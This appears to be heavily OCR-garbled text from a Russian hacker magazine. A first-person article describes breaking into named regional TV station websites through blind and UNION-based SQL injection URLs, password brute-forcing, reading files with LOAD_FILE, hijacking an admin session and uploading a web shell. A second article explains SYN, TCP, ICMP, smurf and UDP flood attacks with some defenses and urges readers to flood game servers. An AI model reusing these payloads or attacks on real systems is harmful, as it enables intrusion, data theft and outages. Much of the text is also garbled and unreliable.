(зіг, пит, соипі) из строки зіг; соипЦ начиная с символа пит. 
Исходя из того, что сценарий не вернул ничего полезного, 
прав на заход в тузці. изег было явно недостаточно. 
Продолжу рассказ о трепанации сценария. Я вспомнил, 
что у меня была структура БД. Посмотрев ее подробнее, 
я смог найти описание одной из таблиц: 



СНЕАТ^АВ^^еи^ ( 
ч изег_ ісР іп1(11) МОТШ ЬІ аи1:о_іпсгетеп1:, 
Туре_ісГ іпі(11) ЫОТЫІІІЩсІеІаиІі'О 1 , 
ЦиІІпате' ѵагсГіаг (255) сіеіаиіі Ы1іи_, 
'ІодігГ ѵагсГіаг (50) сіеіаиіі Г\ІІЛ_І_, 

'раззѵѵ ѵагсГіаг (50) сіеіаиіі Г\ІІЛ_І_, 

'етаіГ ѵагсГіаг (50) сіеіаиіі І\ІІЛ_І_, 
ЩоситепГ іехі, 

'ргоЛГ ѵагсГіаг (50) сіеіаиіі І\ІШ_І_, 

'зогТ іпі: (1 1 ) ЫОТ МІЛЬ сІеТаиД 'О 1 , 

РРІМАРѴ КЕУ ('иземсГ), 

КЕУ ТиІІпате' (ТиІІпате'), 

)ТѴРЕ=МуІ5АМ АиТО_ІМСРЕМЕІ\ІТ=14; 



Я сформировал запрос: 



ѵіе\л/Оос.рГір?сІосісІ=1+АІ\ІО+азсіі(зиЬз1:гіпд((ЗЕІ_ЕСТ+ изег. 
ісІ+1гот+изег_іЫ+иМІТ+1),1,1))>47, 




> На нашем БѴБты 
найдешь все мои 
самопальные скрипты, 
которые помогли мне в 
нелегком деле. Также 
я заснял потрясный 
видеоролик, демонс- 
трирующий процесс 
аудита региональных 
телекомпаний. 



РЯЫСЕК! 



> Данная статья есть 
плод моего больного 
воображения. Не взду- 
май повторять вышео- 
писанное на практике: 
все действия хакера 
уголовно наказуемы. 
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В результате получил содержимое стра- 



МНЕНИЕ СПЕЦИАЛИСТА 



ницы ѵіе\лЮос.рІ'ір?сІосісІ=1, что говорило о 



В данный момент в региональных телекомпаниях трансляция вещания хоть и произ- 



правдивом результате. Затем сформиро- 



водится в цифровом формате, но в большинстве своем изолировано от внешней сети. 



вал еще один запрос: 



Опасность могут составлять лишь различные сопутствующие сервисы, — такие как 8М8 



СИаі, где информация передается поинтернету от оператора связи, принимающегоСМС. 



Взломав Веб-сервер, взломщиктеоретически сможет получить доступ ктаким сервисам 
и скомпрометировать их. 

Что касается нашего сайта, то с апреля ситуация кардинально изменилась: мы полно- 
стью сменили движок хакер и передали отдельной компании поддержку по его работе. 

Паршуков Максим, технический сотрудниктелекомпании Эра-ТВ 



ѵіе\д/Рос.рІтр?сІосісІ=1+АМР+а5СІІ(5иЬз1:гіпд((5ЕІЕСТ+ 

иземЩ{гот+изегШІ-ШІМІТЩ),1,1))<55 



И я снова получил положительный результат. 
Постепенно я подобрал первый азсіі-код сим- 
вола, и он был равен 49. Потом я решил прове- 
рить, имеет ли число больше двухсимволов: 



ѵіеѵѵРос.рІтр?сІосісІ=1-і-АМР-і-азсіі(зиЬз1:гіпд((5ЕЕЕСТ-і- 
иземЩ{гот+изег_ШІ+иМІТ+1 ),21 ))>47 



Получил іаізе (пустую страницу). Далее было 
решено узнать логин и пароль. Сделал запрос: 



ѵіеѵѵРос.рІпр?сІосісІ=1 +АЫР+азсіі(зиЬз1:гіпд( (ЗЕЕ ЕСТ+Іод| 
іп+Ггот+изедЬІ+ѴѴНЕРЕ+изег_ісІ=49+ЕІМІТ+1),Щ))>{ 



Результат был іаізе. Я выудил еще пару ісі — у 
всех был такой же результат. Меня интересо- 
вал один-единственный вопрос: есть ли хоть 
один нормальный ісі? В этом мне помог запрос: 



ѵіеѵѵРос.рІпр?сІосісІ=1 +А МР+азсіі(зиЬзІгіпд((ЗЕЕЕСТ+Іод| 
п -Цгогт^^зедЬ^^Н ЕН^^зеЦ^Ц^- N ОТ+ N ЕІ І_ І_+ І_І М ф 



И опять промах! Время было позднее, так 
что я на все забил и лег спать. На следую- 
щий день, обдумав дальнейшие действия, я 
продолжил атаку. Вспомнил, что у меня есть 
еще и баннерный движок. Скачав и устано- 
вив его, посмотрел имена таблиц и полей в 
базе данных (рНрасІз_соп{ід — таблица, в 
которой хранился пароль и логин админа; 
асітіп — логин; асІппіп_р\л/ — тсІ5 хэш па- 
роля). Долго не думая, я начал вытаскивать 
логин и хэш пароля. Логин выудил таким же 
принципом, что и раньше, добавив лишь в 
него функцию Іоѵѵег (приводит символы к 
нижнему регистру): 



ѵіеѵѵОос. рИр?ЦосіЦ^^А^^^зсіЦІо^еіЦзиЬзШ 
((ЗЕЬЕС^Нодіг^юггтізедЬЩЦМ^Щ^^ 



А вот с хэшем пароля провозился час (лень 
было писать скрипт для автоматизации). Пос- 
тавил хэш на брут и довольно быстро его по- 
добрал по словарю — пароль был «АОпгііп». 
Успешно залогинившись, я начал искать 
каталог, где хранятся все баннеры. 
Скоро мне удалось его найти — /Йоте 
/зІисІіо-41 .сот/Ьаппегз/асІз/. Однако, обра- 
тившись к имени моего сценария, увидел 
ошибку 404. Я вернулся к изучению настроек 
и вскоре нашел кнопку «Переместить банне- 
ры и 80І_-базы в локальную папку». Я снова 
перешел по тому линку и в этот раз увидел 
ошибку 500 (видимо, не было прав на выпол- 
нение). Тогда было принято решение найти 
админку сайта и опробовать связку логин: 
пароль там. За пять секунд я определил путь 
( зЩсііо-41 .сот/асітіп ) и выяснил, что связка 
не работает. Но мне вспомнилось тема про 
существование пользователя, зареганного 
в системе управления баннерами. Админ, к 
сожалению, не мог посмотреть его пароля, 
поэтому я решил снова вернуться к зці-іп) 
и выудить хэш пароля. В этот раз мне уже 
было лень париться и вручную делать пере- 
бор, поэтому я сваял автоматизированный 
скрипт (см. файл зцНопЛ. рНр на 0\Ю). Залив 
сценарий на хост и изменив передаваемый 
ему параметр зр, я выудил весь хэш. Полу- 
ченное добро быстро отправилось на брут. 



Результат был достигнут уже через 2 мину- 
ты — АОтах. Но когда я опробовал связку 
\ллллл/:АОтах на админку, я опять обломался. 
Отложив взлом в долгий ящик, я решил пойти 
дальше по списку — егаіѵ.ги . 

Эра-ТВ 

Меню сайта было выполнено на флеше. Ни- 
каких публичных скриптов не наблюдалось. 
На первой странице красовались новости 
со ссылками на более подробное их содер- 
жание. К одной из таких ссылок я и обра- 
тился: Иир://ега1ѵ.ги/іппег. рІпр?раае=пе\л/5І& 
ісІ=100443 . Подставив в конце параметра ісі 
одинарную кавычку, я получил страницу с 
оформлением, но без данных новостей или 
ошибки. Мне показалось, что так не должно 
быть:). Я прибавил ИКПОИ и начал подбирать 
количество столбцов. Уязвимость я нашел 
после запроса: 



ІтДр|АегаІѵт^ рГір?раде=пеѵѵ5І&ісІ=-999+ иМІОМ| 

+8ЕІ_ЕСТ+1 ,2,3,4/* 



Первым делом я проверил, под каким поль- 
зователем я в Му80І_ и он ли это вообще. 
Подставляя вместо третьего столбца изег (), 
сІаІаЬазе (), ѵегзіоп (), получил следующую 
инфу: 



изег: гооі@ІосаІГіозі 



В1ЯШ 



ѵегзіоп:4.0.13-п 
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> Рулим баннерами 



> Святая-святых — админка форума 



Судя по приставке в конце версии, сервак крутился на винде. Я 
выудил из базы хэш пароля от Му8С)І_ пользователя гооі: 



НДр://егаІѵ.ги/іппег.рНр?раде=пе\л/5І&ід=999+ЦМОМ+5ЕЕ ЕСТ+и5е г,2,раз5ѵѵо гсІ,4+Р 

РЮМ+туздІ. изег+ЫМІТ+І/* 



Разумеется, я поставил на него брут. Но даже спустя 12 часов брут 
не завершился (хоть чем-то администраторы защитили свой ресурс). 
Тогда я снова зашел на сайт и обратил внимание на копирайты фир- 
мы, написавшей движок — «Создание сайта 2003 іТех.ги». И я поду- 
мал: «А что если найти еще сайты, разработанные данной фирмой 
— вдруг какой-нибудь из них выводит запрос с названиями таблиц? 
Подумано — сделано! Я скомандовал Гуглу «Создание сайта ІТех.ги», 
и он мне вывел 8 страниц с различными сайтами. Я стал заходить на 
каждый из них по очереди. Не прошло и 5 минут, как обнаружился 
ресурс, который мне любезно выдал сам запрос. Посмотрев на на- 
звание новостной таблицы — ххх_пе\д/з, — я не понял, для чего нужен 
такой префикс. Я вернулся к сайту егаіѵ.ги с полученным знанием о 
таблицах. Подбирая стобцы и таблицу, получил следующий запрос, 
выдавший нужную инфу: 



Иір://егаІѵ.ги/іппег.рИр?раде=пеѵѵз1<?Ш=-999+ипіоп+зеІесІ+1,2, 1_ОАО_ЕІІ_Е(Ох4^АІ 
5С6170616368655С6874646Е63735С696Е6Е65722Е706870),4/* 



Наконец я увидел исходник файла! Поизучав его, мне удалось 
найти ссылку на файл іипсііопз. рНр. Просмотрев его исходник, 
я отыскал пароль к Му301_ — дЬрІІѵѵуТ [ец. Однако он мне ничего 
не дал, поскольку ключи к МуЗОІ_ и админке были разными. Но я 
решил посмотреть исходник админки — асітіп. рНр — и нашел 
строку регистрации сессии, имя у которой было аіЛІі. Подглядев 
еще и в код скрипта, я увидел строки: 



$асІтзез5Іоп=гапсІ (100, 1000); $асІтзез5Іоп=тсІ5 (Засітзеззіоп); 
Згез^уздСдиеітСи^ 

$1іте=1іте 0-259200; 

іЦІ55еЦ$аЦт5е55іоп))$ге5=ту 5дІ _диегу(«зеІесіНгот » . РРЕ Е.«_асІтіпѵѵГіеге1 
зе55Іоп=\«$а0тзез5Іоп\« »); 



Для тех, кто не понял, объясняю: если я вытяну идентификатор 
сессии из базы, то попаду в админку без пароля. Сессию админа я 
получил таким запросом: 



іНр://ѳга1:ѵ.ги/іппег.рІпр?раде=пеѵѵз1&ісІ=-999+иМІОМ+ЗЕЕЕСТ+разз\А/огсІ,2,Іодіп,4+|Иіп1:1:р://ега1:ѵ.ги/іппег.рЬр?раде=пеѵѵз1&ісІ=-999+ипіоп+зе1ес1:+1,2,зеззі- 



Результат был положительным (логин — сііира, МуЗОІ_ хэш 
пароля — 5сІ2е994154е08а16). Я попробовал его побрутить и 
параллельно поискать админку. Пассворд я так и не узнал, а 
зона администрирования быстро нашлась ( НПрУ/егаІѵ.ги/абтіп. 
рНр ). Через несколько минут я нашел еще одну занимательную 
страницу ( НПрУ/егаіѵ.ги/іппег. рГірѴраае^ѵіз&ісІ^ "). в которой 
при подстановке одинарной кавычки в параметр ісі выводилась 
ошибка: 



«ѴѴагпіпд: туздІ_пит_гоѵѵз (): зиррііесі агдитепі із поіа ѵаіісі Му ЗОЬ гезиіі гезоигсѳ іп 
0:\арасІіе\Іі1сІос8\соп1еп1. рііроп Ііпе 5679». 



Главным в этой ошибке был путь! Я вернулся снова к зді-іщ, и мой 
запрос был такой: 



|Гі1:1:р://ега1:ѵ.ги/іппег.рІір?раде=пеѵѵз1&ісІ=-999+ипіоп+зе1ес1:+1,2, 1_ОАР_ЕІІ_Е| 



Я ничего не получил, поэтому решил, что включена опция тадіс_ 
циоіез. Заботливо закодировав путь, запрос преобразовался в 
следующий вид: 



Изменив в опере с помощью редактора куков поле аиіН (подправив ему 
имя и полученный идентификатор сессии), я обновил страницу и был в 
админке! Полазив, нашел место для загрузки прайс-листов. Скачав те- 
кущий прайс, я попробовал на его место загрузить шелл, и он успешно 
аплоаднулся. Я попытался найти его в папке НДр://ега1ѵ.гиЛіІез/ и отыскал 
шелл в файле ргісе. 2 Ір. Заменив этот файл оригиналом, посмотрел на 
адрес страницы: ИДр://ега1ѵ.ги/асІтіп.рІпр?таіп=гекІааеп5І&сІа1аііІе=р 
гісе.2Ір&іб=100000&5иЬ=2&гапсІ= 16063 . Значение баіаПе я исправил 
на зГіеІІ. рГір, обновил страницу и снова загрузил шелл! Все, я внутри! 
Сначала я изучил папку Місіосз, где было два интересных файла: 1 . рМр 
и зузіет. рНр (один из них являлся оболочкой для работы с МуЗОЦ а вто- 
рой — шеллом). Полазив, я нашел пароли, зашифрованные отйр. Так- 
же я узнал, что, скорее всего, сервак находится внутри сети телеканала. 
Но изучать их локалку я не стал, так как моей целью был только сайт. 

Аудиторское заключение 

На этом я завершаю свою статью. Мое мнение по поводу безо- 
пасности сайтов телекомпаний подтвердилось, особенно это выра- 
зилось в последнем сайте, когда в общем доступе лежал шелл. Я 
не проверял дату создания файла, но думаю, что хакеры работали 
давно, и даже никто из администраторов его не заметил. И-Е 
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ТЕОРИЯ И ПРАКТИКА 0008-АТАК 

КАК ЖЕ ТЕБЯ ДОСТАЛО ЭТО МОЛОДОЕ ПОКОЛЕНИЕ! ЕЩЕ НИЧЕГО НЕ УМЕЮТ, НИЧЕГО НЕ ЗНАЮТ, НО УЖЕ «ВАЛЯТ» КАКИЕ-ТО 
СЕРВЕРЫ. ОПЯТЬ ЗАФЛУДИЛИ ТВОЙ ЧАТ, ПОВЕСИЛИ СЕРВАК С СЗ, «ПОЛОЖИЛИ» ФОРУМ. ДЕТВОРА... НАВЕРНЯКА КТО-ТО 

ВЫЛОЖИЛ В Ріівис СВОЙ ФЛУДЕР, вот молодежь и развлекается, что там опять? снова нттр/оет-запросы? 

НЕ СТРАШНО, ЭТУ ОШИБКУ МЫ СЕЙЧАС ИСПРАВИМ. ЭФФЕКТИВНО ДОСИТЬ НА ПРИКЛАДНОМ УРОВНЕ НЕЛЬЗЯ: В НЕМ ВСЕ 
ВОПРОСЫ РЕШАЕТ ГРАМОТНАЯ ФИЛЬТРАЦИЯ. А ЕСЛИ БЫ ОНИ СПУСТИЛИСЬ НИЖЕ ПО СТЕКУ, ТО НАШЛИ БЫ ПРОСЧЕТЫ 
В АРХИТЕКТУРЕ ТРАНСПОРТНЫХ И СЕТЕВЫХ УРОВНЕЙ. ТОГДА ЭТО БЫЛО БЫ ПОТРЯСЕНИЕМ ДЛЯ ВСЕХ, А ТАК ЭТО ПРОСТО 
БАЛОВСТВО, ПРАВДА, ИНОГДА ОЧЕНЬ ОПАСНОЕ. 



I ро ЭоЗ-атаки нѳ писал только лени- 
вый. Тема «изъезжена». Ты столько 

I I раз про них читал в журналах и на 

форумах, что каждая новая статья восприни- 
мается как следующая серия бесконечного 
бразильского сериала. Такие сериалы отуп- 
ляют, аты ведь нехочешь стать дополнением 
к телевизору? Может, разберемся, по каким 
законам строятся все эти мыльные оперы? 
Тогда ты избавишься от необходимости 
смотреть их. Рассмотрим ЭоЗ-атаки только 
сетевого и транспортного уровня. Почему 
только их? Потому что эти атаки не зависят от 
способов реализации протоколов более вы- 
соких уровней, азначит, применимы клюбым 
системам, использующим стек протоколов 
ТСР/ІР. Это предоставит нам возможность не 
зависеть оттого, с какими протоколами при- 
кладного уровня работает интересующая 
нас система. Что очень важно, поскольку ог- 
раничить, изменить или заменить протокол 
прикладного уровня можно практически все- 



гда, а вот отказаться от протоколов сетевых и 
транспортных уровней — нет. 

О Кто владеет информацией, 
тот владеет миром 

Еслитебе не надоеще раз повторять, почему 
ЭоЗ-атаки опасны, то можешь смело пере- 
ходить к следующему абзацу. Этот абзац для 
тех, чей сервер не был в дауне от стопроцен- 
тной загрузки проца, у кого пользователи не 
бились в истерике по поводу недоступности 
их ресурса и чье начальство не грозилось 
оторвать кому-нибудь голову, если все сно- 
ва не заработает через пять минут. Все ба- 
нально. В современном мире доступность 
информационного ресурса является одним 
из основополагающих факторов, опреде- 
ляющих его стоимость. Ты и сам знаешь, что 
информацию не обязательно красть — ее до- 
статочно сделать недоступной, пусть даже на 
некоторое время, и тогда она потеряет свою 
актуальность, а следовательно, и ценность. 



Основную угрозу доступности информации 
в настоящее время как раз и представляют 
атаки класса отказа в обслуживании (ЭепіаІ 
оі Зегѵісе — ЭоЗ), а точнее, их распределен- 
ный вариант ЭезігіЬиіесІ ЭепіаІ о! Зегѵісе 
(ЭЭоЗ) — распределенные атаки отказа 
в обслуживании. Если говорить научным 
языком, то основной целью ЭоЗ/ОЭоЗ-атак 
является выведение информационного объ- 
екта из рабочего состояния, нарушение его 
нормального функционирования, снижение 
качества предоставляемых им услуг. Основ- 
ной чертой ЭоЗ-атак является простота ор- 
ганизации и высокая степень анонимности 
атакующего. Кроме того, против подобных 
атак нет стопроцентной защиты. Именно пе- 
речисленные выше факторы привлекают к 
ЭоЗ/ЭЭоЗ-атакам внимание специалистов 
по безопасности по обе стороны сетевых 
баррикад. За примерами «страшных исто- 
рий» далеко ходить не надо. Ноябрь 2002: 
семь из тринадцати корневых сіпз-серве- 
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ров всемирной паутины выведены из строя 
спланированной ЭоЗ-атакой. Август 2003: 
серверы Озігизоіі крупнейшего хранилища 
ІР-адресов были отключены после большо- 
го количества распределенных на них ЭоЗ- 
атак (данная служба занималась ведением 
динамического списка ІР-адресов, замечен- 
ных в спаме). Сентябрь 2005: американский 
подросток укладывает сеть интернет-мага- 
зинов. Причиненные им убытки оцениваются 
в 1,5 миллиона долларов. Сейчас открой лю- 
бой баг-трек, раздел новостей. Что? Опять? 
Снова? Да как же они это делают? 

О Немного теории 

Атаку на отказ в обслуживании можно про- 
вести тремя способами: 

1. Используя уязвимости в программном 
обеспечении; 

2. Посылая сетевой трафик на атакуемую 
систему, превышающий ее пропускную спо- 
собность; 

3. Захватывая критические системные ре- 
сурсы атакуемой системы: процессорное 
время и память. 

Рассмотрим каждый из способов более 
подробно. Первый способ состоит в том, 
чтобы, используя уязвимости (ошибки) в 
программном или аппаратном обеспечении 
системы, нарушить ее работу. Вспомни Іапб, 
ріпд-сіеаііі. Такой способ самый легкий. Он 
не требует больших вычислительных и се- 
тевых ресурсов нападающего, однако по- 
добные атаки предполагают использование 
уязвимостей, что само по себе усложняет 
задачу, ведь сегодня уязвимость в атакуе- 
мой системе есть, а завтра она может быть 
устранена. Поэтому на сегодняшний день 
более популярны второй и третий способы, 
которым и уделяется основное внимание в 
данной статье. 

При втором способе атакующий посылаетсис- 
теме большое количество сетевого трафика. 
В результате того, что атакуемая система ока- 
зывается перегружена сетевым трафиком, 
она не может выделять свой сетевой ресурс 
легитимным пользователям, и эти пользовате- 
ли не могут пользоваться ее услугами. 



Третий способ состоит в том, чтобы навязать 
атакуемому серверу действия, расходующие 
его системные ресурсы: процессорное время 
или память (то, что для него критично). Это мо- 
гут быть многократные запросы на выполне- 
ниетрудоемкихоперацийсбазами данных или 
запросы на выделение памяти под процессы, 
которые не будут использоваться. Рассмот- 
рим более подробно разновидности атак, ис- 
пользующие второй и третий способы. 

□За ошибки в архитектуре 
приходится дорого расплачиваться 

Атак, основанных на протоколе ТОР, больше 
всего (их целыхтри):ТСР{ІоосІ, ТОР ЗѴІЧ РІооби 
ге{Іес1іоп5Ѵ[\ІИоосІ. 

ТСРЗУИПосй 

Вдохни поглубже. Коротко об этой атаке не 
расскажешь. Она не сложная, нет. Просто в 
свое время была допущена ошибка в проек- 
тировании всего транспортного протокола 
ТСР Расплачиваться за нее пришлось долго и 
большой кровью. Ты спросишь, в чем ошибка? 
Не торопись, сейчас все поймешь сам. Давай 
вспомним, что происходит при установлении 
ТСР-соединения согласно стандарту ЯРС- 
793. Происходит так называемое трехуровне- 
вое рукопожатие: 

1. Клиент посылает серверу пакет с 5ѴКІ- 
флагом и установленным начальным номе- 
ром (ЗЕО) клиенткой последовательности 
пакетов(ЗЕО=ІЗМ_С), который говоритотом, 
что мы хотим установить соединение: 

СІІепі — (8ЕС)=І5І\І_С, СТР1І_=ЗѴІ\І). > Зегѵег; 

2. Сервер отвечает клиенту ЗѴІМ/АСК паке- 
том (ваш пакет с 8ѴЫ= І8І\І_С получен, готов 
установить соединение, мой начальный но- 
мер последовательности пакетов (ЗѴЫ) ра- 
вен І8ІЧ_8): 

Зегѵег — (ЗЕО=ІЗІ\І_3, АСКЫ= ІЗІ\І_С+1, СТН1_=ЗУ1Ч 
АСК)---> СІІепІ 

3. Клиент на это отвечает серверу пакетом 
АСК, и соединение считается установленным: 



СІІепі (ЗЕО=ІЗІ\І_С+1 , АСКІ\І= І5І\І_3+1 , СТНІ_=АСК)- 

- — > Зегѵег 

Убрав из схемы трехуровневого рукопожа- 
тия шаг номер 3, можно реализовать атаку 
ТСР ЗУІЧ РІооб. Тогда на втором шаге сервер 
посылает клиенту ЗУЫ/АСК-пакет, переводит 
сессию в состояние 8УЫ_РЕСЕ1\/ЕО и заносит 
пакет в очередь. Добавление пакета в очередь 
означает, что если в течение установленного 
интервала времени сервер не получит под- 
тверждения, что данный пакет дошел до ад- 
ресата (шаг №3 и есть это подтверждение), то 
он будет считаться потерянным и потому будет 
послан снова. Если подтверждение в виде 
ЗѴІЧ/АСК-пакета будет получено, то пакет бу- 
детудален из очереди. 

Представим, что произошла попытка ус- 
тановки еще одного соединения, и новый 
пакет из шага №2 добавляется в очередь. 
А потом еще одна попытка и еще один пакет. 
Очередь имеет свои известные пределы, 
поэтому рано или поздно должно произой- 
ти ее переполнение. После чего сервер 
перестает реагировать на всякие попытки 
установления соединения. Строго говоря, 
в различных системах работа с очередью 
реализована по-разному. После истечения 
некоторого времени система удаляет па- 
кеты из очереди. Однако ничего не мешает 
атакующему послать новую серию запро- 
сов, чтобы вновь заполнить буфер атакуе- 



> Атакующий проводит ІЮР РІооб, посы- 
лая пакеты на ІЮР порт 445 (8МВ оѵег 
ТСР/ІР), используя свой реальный ІР 
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мой системы, тем самым и далее поддержи- 
вая ее в нерабочем состоянии. Реализация 
атаки ЗУІМ-ЛоосІіпд основывается натом, что 
жертве могут посылаться как пакеты от име- 
ни ІР-адреса, которого реально не сущест- 
вует (ІР-зрооТіпд), так и пакеты с реального 
ІР-адреса атакующего. 

Обнаружить данную атаку довольно просто, 
ее характеризуют: 

1. Большое количество соединеня в состоя- 
нии ЗУІМ_РЕСЕІѴЕЭ; 

2. Игнорирование попыток соединения с дан- 
ным портом. 

Затопление ЗУІМ-пакетами — самый извес- 
тный способ «загрузить» информационный 
канал. В результате этой атаки жертва пере- 
стает реагировать на попытки установления 
соединения, то есть попросту отбрасывает 
все приходящие пакеты. Этот вид ЭоЗ-атаки 
очень распространен — практически все из- 
вестные порталы в свое время страдали от 
подобных атак. 

Механизмы защиты от атаки ЗУІМ-ПоосІ: 

а. Выбор оптимального таймаута, по истече- 
нии которого полуоткрытые соединения вы- 
брасываются из буфера. 

б. Очистка наиболее старых полуоткрытых 
соединений. 

в. ЗУ N СООКІЕ. Это самый действенный спо- 
соб защиты от ЗУІМ РІооб-атак, поговорим о 
нем более подробно. В этом способе трех- 
этапное соединение ТСР сводится к двум 
этапам: при получении ЗУІМ-пакета сервер 
отвечает пакетом ЗУІМ/АСК и не заносит 
никакую информацию в очередь (забыва- 
ет о клиенте). Идея этого способа защиты 
заключается в следующем. Значение І31\1_3 
формируется сервером в пакете ЗУІМ/АСК. 
Так вот, если зашифровать в значении ІЗІМ_ 
3 Ір-адрес клиента, то в случае корректной 
работы клиент возвратит АСК-пакет со 



> Атакующий проводит ІЮР РІоосІ от 
чужого имени (зроойпд), посылая пакеты 
с поддельным Ір-адресом источника 
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значением АСКІМ = 131М_3+1, а сервер рас- 
шифрует его, извлечет из него начальный 
ІР-адрес, сравнитегос ІР-заголовком ІР-па- 
кета, и если адресасовпадают, то установит 
соединение. Если адреса из расшифрован- 
ного значения АСКІМ = 131М_3+1 и значения 
ІР-заголовка совпадать не будут, значит, 
происходитзупЛооб-нападение. Существу- 
ют два механизма реализации ЗУІМ СООКІЕ. 
Один разработан Стивом Гибсоном, другой 
— Дэном Бэрнстейном (Эап Вегпзіеіп) и 
Эриком Шенком (Егіс Зсбепк). Концепция 
Зуп соокіе соответствует стандарту РРС- 
793, она требует доработки только сервер- 
ной части и не касается клиентской. 

Ну что, осилил? Все отложилось в голове? 
Теперь можешь немного расслабиться, Зуп 
РІоосІ позади. Все остальное проще. 

терпок 

ТСР ІІоосІ — это вид атаки, при котором с 
атакуемой системой устанавливается мно- 
жество ТСР-соединений, что приводит к 
связыванию ее системных ресурсов. При 
этом виде атаки происходят все три стадии 
установления ТСР-соединения, описанные 
выше, но никакие данные после установки 
соединения не пересылаются, а происхо- 
дит установление следующего соединения 
ит.д. 

Количество ТСР-соединений, которые 
может установить одна система, теоре- 
тически ограничивается цифрой в 65535, 
а на практике это еще меньше из-за пор- 
тов, используемых системными служба- 
ми и пользовательскими приложениями. 
С одной машины серьезную систему не 
повесишь, но вот израсходовать лимит 
установленных соединений (если он есть) 
можно. Израсходовав лимит на количество 
одновременно установленных соединений, 
атакуемая система не сможет устанавли- 
вать новые соединения с легитимными 
пользователями и предоставлять им свой 
ресурс. Если ТСР РІоосІ используется при 
организованном ЭЭоЗ'е, то эффективной 
защиты против него нет. 



РеЯес+іоп ЗУІМ Лею гііпд 

Какуже говорилось выше, ТСР-соединение 
требует, чтобы любая ТСР-служба, которая 
получает ЗУІМ-пакет, ответила ЗУІМ/АСК- 
пакетом. Наопределенныесерверы всети, 
называемые «отражателями», посылаются 
пакеты с исходным ІР-адресом, указываю- 
щим на атакуемую машину. Сервер или 
гоиіег, который получает эти поддельные 
ЗУІМ-пакеты, посылает ЗУІМ/АСК-ответы 
на атакуемый хост. Любая ТСР-связь с 
сервером общего назначения может ис- 
пользоваться для того, чтобы «отразить» 
ЗУІМ-пакеты. Довольно легко может быть 
построен список, в котором будут перечис- 
лены гоиіег’ы и серверы, отвечающие на 
ЗУІМ-пакеты. Наиболее популярные ТСР- 
порты — 22 (Зесиге ЗНіеІІ), 23 (ТеІпеД и 80 
(НТТР/ѵѵеЬ). Кроме того, многие гоиіег'ы 
подтвердят ТСР-соединение по 179 порту. 
И мея бол ьшой список «ЗУ N -отражателей», 
каждый злоумышленник может распреде- 
лить поддельные ЗУІМ-пакеты равномер- 
но через весь набор роутеров/серверов 
в списке. Компьютер, который получает 
ЗУІМ-запрос, ожидает ЗУІМ/АСК-ответ, 
а при его отсутствии посылает еще не- 
сколько ЗУІМ/АСК-пакетов. Поэтому «от- 
ражатели» отправят в три или четыре раза 
больше ЗУІМ/АСК-пакетов по сравнению с 
числом полученных. Это также означает, 
что ЗУІМ/АСК-пакеты продолжат атаковать 
целевой сервер в течение некоторого вре- 
мени даже послетого, как злоумышленник 
прекратил нападение. 

□Старо как мир, но работает 

Атак, основанных на протоколе ІСМР две: 
ІСМР ТІоосІ и ЗтиіМ- ріпд. 

ІСМРЯоосІ 

ІСМР ІІооб — это далеко не новый вид атаки, 
который, тем не менее, не теряет популяр- 
ности. Здесь используется команда ріпд. 
Ріпд изначально задумывался для проверки 
качества соединения с удаленным компью- 
тером. Принцип работы команды: отсыла- 
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> Загрузка процессора системы «жертвы» во время 
ІЮР РІоосГа. Никакой персональный файрвол не 
может справится с таким «затоплением» 




> ТСР-соединение на компьютере жертвы находиться 
в состояниии ЗѴІ\І_Весіѵеб во время проведения ЗѴІЧ 
РІоосГа 



ется сообщение ЕСНОПЕОІІЕЗТ, на которое удален- 
ный компьютер автоматически отвечает сообщением 
ЕСНОПЕРІ_Ѵ. Согласно РРС, операционная система 
всегда обязана при получении запроса ЕСНОРЕОІІЕ5Т 
ответить сообщением ЕСНОПЕРІ_Ѵ, а значит, затратить 
на это часть своих ресурсов. ІСМР — протокол для диа- 
гностики сетевых систем, и зачастую от него нельзя от- 
казаться. 

Он был, есть и будет, а с повсеместным внедрением 
ірѵб его роль возрастет еще больше. Но если ты дума- 
ешь, что старыми добрыми ЕСНОРЕОІІЕЗТ-запроса- 
ми уже ни одну систему не загрузишь, то ошибаешься. 
Посмотри, как ими можно загрузить виндовый сервак 
в локальной сети. 

Зтиг-Г - ріпд-запросы ІСМР 

Едем дальше, атака ЗМІІВР. Эксперты ее относят к наибо- 
лее опасным разновидностям ЭоЗ-атак. Сейчас объясню 
почему. ЗМІІРР использует эффект усиления, являющий- 
ся результатом отправки широковещательных запросов 
ріпд к системам, которые всегда обязаны ответить на него. 
Запрос направляется либо на сетевой адрес, либо по ад- 
ресу широковещательной рассылки сети. Прямая широ- 
ковещательная рассылка обычно служит для диагностики, 
позволяя выявить работающие системы без ріпд-запроса 
каждого адреса из диапазона. В атаке ЗМІІВР использу- 
ются особенности широковещательной рассылки. Для 
ее проведения требуются, как минимум, три системы: 
атакующий, усиливающая сеть и атакуемый. Атакующий 
посылает поддельный пакет ІСМР ЕСНО по адресу широ- 
ковещательной рассылки усиливающей сети. 

Адрес источника этого пакета заменяется адресом 
жертвы, как будто именно целевая система 
инициировала запрос. 

После этого происходит следующее: поскольку пакет 
ЕСНО послан по широковещательному адресу, все сис- 
темы усиливающей сети возвращают жертве свои отве- 
ты (если только конфигурация не определяет другого 
поведения). Послав один пакет ІСМР в сеть из 100 сис- 
тем, атакующий инициирует усиление атаки ЭоЗ в сто 
раз. Коэффициент усиления зависит от состава сети, 
поэтому атакующий ищетбольшуюсеть, способную пол- 
ностью подавить работу атакуемой системы. Механизм 
защиты от ЗМЕІВР — ріпд-запров ІСМР. 

Специалисты по сетевой безопасности рекомендуют 
предпринять следующие контрмеры: 

1. Чтобы предотвратить эффект усиления, нужно позво- 
лить запрет операций прямой широковещательной рас- 
сылки на все граничные маршрутизаторы; 

2. Установить в операционной системе режим «тихого» от- 
броса широковещательных эхо-пакетов ІСМР. 



О Без установки соединения. Кодег ІНаі 

Атак, основанных на протоколе ІЮР две: ІЮР Яооб и ІЮР 
ІгаддІеНооб. 

ІЮРЯоогі 

При проведении этой атаки происходит отправка на 
адрес атакуемой системы множества пакетов ІЮР, что 
приводит к «связыванию» сетевых ресурсов атакуемо- 
го. Данная атака является одним из способов затопле- 
ния канала бесполезным сетевым трафиком (мусором). 
Если не можешь навскидку припомнить, какие извес- 
тные тебе приложения используют ибр-протокол, то 
вспомни про свой любимый СЗ. Сервер этой игры ис- 
пользует порт ибр 27015. Знаешь, что такое дискретное 
перемещение? Это когдатвои друзья играют на серваке, 
который ты в данный момент заваливаешь ибр Лооб'ом. 
Между прочим, на протоколе ІЮР построены почти все 
нынешние сетевые игры, так что тебе есть на чем тре- 
нироваться. 

ІЮР -Ггаддіе Яоо 

